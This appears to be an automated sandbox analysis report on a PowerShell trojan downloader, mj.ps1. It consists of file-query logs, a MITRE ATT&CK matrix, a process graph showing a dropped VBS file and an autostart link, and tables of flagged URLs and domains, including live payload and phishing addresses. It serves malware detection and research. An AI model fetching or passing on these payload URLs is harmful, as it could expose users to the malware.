          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix, one line per tactic (the count badges shown in the report's matrix are kept in square brackets; entries without a badge are the matrix's unmatched placeholder techniques):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter [12]; Exploitation for Client Execution [1]; PowerShell [3]; Cron; Launchd; Scheduled Task
Persistence: Scripting [111]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [11]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [21]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [12]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1569000 | Sample: mj.ps1 | Startdate: 05/12/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: www.fornid.com; fornid.com; 5 other IPs or domains
  Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
  Started: powershell.exe (node 9)

powershell.exe (node 9)
  DNS/IP: fornid.com 93.95.216.175, 443, 49728 SERVERPLAN-ASIT Italy; www.pineappletech.ae 91.193.42.13, 443, 49734 ITFPL Belgium
  Dropped: C:\Users\Public\p2q.vbs, ASCII
  Signatures: Powershell creates an autostart link
  Started: wscript.exe (node 14); powershell.exe (node 17); conhost.exe (node 19)

wscript.exe (node 14)
  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 2 other signatures
  Started: powershell.exe (node 21)

powershell.exe (node 17)
  Signatures: Loading BitLocker PowerShell Module

powershell.exe (node 21)
  DNS/IP: erp-royal-crown.info 148.251.114.233, 443, 49777, 49806 HETZNER-ASDE Germany; almrwad.com 184.171.244.231, 443, 49748, 49765 DIMENOCUS United States
  Started: conhost.exe (node 24); cmd.exe (node 26)

Source | Detection | Scanner | Label | Link
mj.ps1 | 32% | ReversingLabs | Script-PowerShell.Trojan.PShell |
mj.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://www.almrwad.com/wh/Subordiner | 0% | Avira URL Cloud | safe |
https://www.fornid.com/wh/List | 0% | Avira URL Cloud | safe |
https://www.fornid.com/ordine | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordinerende | 100% | Avira URL Cloud | phishing |
https://www.almrwad.com/wh/Su | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/ | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordine | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/w | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordineren | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.info/wh/Subordinerend | 100% | Avira URL Cloud | phishing |
https://www.almrwad.c | 0% | Avira URL Cloud | safe |
http://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/90-maschere-per-saldatura | 0% | Avira URL Cloud | safe |
http://www.pineappletech.ae | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordine | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/133-occhiali-protettivi | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.i | 0% | Avira URL Cloud | safe |
https://www.pineappletech.ae/na/mg.vbs | 100% | Avira URL Cloud | malware |
https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordin | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/ | 100% | Avira URL Cloud | phishing |
https://www.almrwad.com/wh/Subordinerendes7 | 0% | Avira URL Cloud | safe |
https://www.fornid.com/contattaci | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerendes | 0% | Avira URL Cloud | safe |
https://go.micro | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subord | 0% | Avira URL Cloud | safe |
https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/ | 0% | Avira URL Cloud | safe |
https://www.almrwad.com | 0% | Avira URL Cloud | safe |
https://www.fornid.com | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerende | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerendes78.sm | 0% | Avira URL Cloud | safe |
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | 100% | Avira URL Cloud | malware |
https://www.almrwad.com/wh/Subordinerendes78.s | 0% | Avira URL Cloud | safe |
https://www.fornid.com/144-filtri-per-maschere | 0% | Avira URL Cloud | safe |
http://www.fornid.com/ | 0% | Avira URL Cloud | safe |
http://almrwad.com | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerendes78 | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subord | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/w | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown. | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware |
http://fornid.com | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware |
https://www.erp-royal-crown.info/wh/Subordinere | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.info/wh | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/sitemap | 0% | Avira URL Cloud | safe |
https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | 0% | Avira URL Cloud | safe |
https://www.fornid.com/145-maschere-antigas | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerend | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordi | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/il-mio-account | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subor | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.info/wh/Subo | 100% | Avira URL Cloud | phishing |
http://www.almrwad.com | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinere | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordi | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.in | 0% | Avira URL Cloud | safe |
https://www.almrwad.co | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordinerendes78. | 0% | Avira URL Cloud | safe |
http://erp-royal-crown.info | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.info/wh/Subordinerendes | 100% | Avira URL Cloud | phishing |
https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf | 0% | Avira URL Cloud | safe |
https://www.fornid.com/img/logo.jpg | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordinerendes78.s | 100% | Avira URL Cloud | phishing |
https://www.almrwad.com/wh | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Sub | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordin | 100% | Avira URL Cloud | phishing |
https://www.almrwad.com/wh/Subo | 0% | Avira URL Cloud | safe |
http://blog.fornid.com/ | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordinerendes78 | 100% | Avira URL Cloud | phishing |
https://www.almrwad. | 0% | Avira URL Cloud | safe |
http://www.fornid.com/content/13-international-shipments | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subor | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Subordinerendes7 | 100% | Avira URL Cloud | phishing |
http://www.fornid.com | 0% | Avira URL Cloud | safe |
https://www.fornid.com/cerca | 0% | Avira URL Cloud | safe |
https://www.almrwad.com/wh/Subordineren | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/ | 100% | Avira URL Cloud | phishing |
https://www.erp-royal-crown.inf | 0% | Avira URL Cloud | safe |
https://www.erp-royal-crown.info/wh/Sub | 100% | Avira URL Cloud | phishing |
Name                      IP               Active   Malicious  Antivirus Detection  Reputation
erp-royal-crown.info      148.251.114.233  true     false      -                    unknown
almrwad.com               184.171.244.231  true     false      -                    unknown
fornid.com                93.95.216.175    true     true       -                    unknown
www.pineappletech.ae      91.193.42.13     true     false      -                    unknown
www.fornid.com            unknown          unknown  true       -                    unknown
